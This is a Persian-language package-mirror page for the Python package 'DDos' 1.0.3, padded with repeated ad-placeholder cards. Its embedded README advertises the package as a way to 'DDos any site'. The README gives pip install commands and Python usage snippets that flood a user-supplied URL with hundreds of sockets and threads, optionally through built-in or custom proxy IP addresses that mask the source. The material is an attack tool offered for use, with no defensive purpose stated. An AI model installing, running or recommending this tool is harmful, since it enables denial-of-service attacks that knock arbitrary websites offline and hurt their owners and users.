معرفی شرکت ها


DDos-1.0.3


Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر

توضیحات

DDos any site
ویژگی مقدار
سیستم عامل -
نام فایل DDos-1.0.3
نام DDos
نسخه کتابخانه 1.0.3
نگهدارنده []
ایمیل نگهدارنده []
نویسنده Elisha Hollander
ایمیل نویسنده -
آدرس صفحه اصلی https://github.com/donno2048/DDos
آدرس اینترنتی https://pypi.org/project/DDos/
مجوز MIT
# DDos DDos any site using python ## Install ### From Pypi `pip3 install DDos==1.0.1` (You should really use this version) ### From GitHub `pip3 install git+https://github.com/donno2048/DDos` ## Usage ### GUI To use it just run: ```sh DDos ``` or ```sh ddos ``` in the terminal to launch the GUI (tkinter is a requirement for the GUI so use: `sudo apt-get update && sudo apt-get install python3-tk -y` on linux and on Windows it's already installed) ### TUI To use the text-based user interface see this python example: ```py from DDos import checkUrl, DDos # import the needed functions while True: url = input("Give me a URL: ") # get a url from the user if checkUrl(url): break # if it's formatted correctly exit the loop else: print("This URL isn't formatted correctly, try again") # else, go back DDos(url, sockets = 400, threads = 10, use_proxies = True) # ddos this url with 400 sockets and 10 threads and use the built-it proxies ``` or simply: ```py from DDos import DDos DDos(input("Give me a URL: ")) # if the url isn't formatted correctly it will have an assertion error, use 500 sockets and 10 threads, no proxies will be used ``` The DDos function has also a `custom_proxies` optional variable and there is a `checkProxy` function, you can use them like so: ```py from DDos import DDos, checkProxy assert checkProxy("109.237.91.155:8080") assert checkProxy("178.128.37.176:80") DDos(input("Give me a URL: "), use_proxies = True, custom_proxies = ["109.237.91.155:8080", "178.128.37.176:80"]) ``` If you give an invalid proxy you will get an assertion error.


نیازمندی

مقدار نام
- fake-useragent


نحوه نصب


نصب پکیج whl DDos-1.0.3:

    pip install DDos-1.0.3.whl


نصب پکیج tar.gz DDos-1.0.3:

    pip install DDos-1.0.3.tar.gz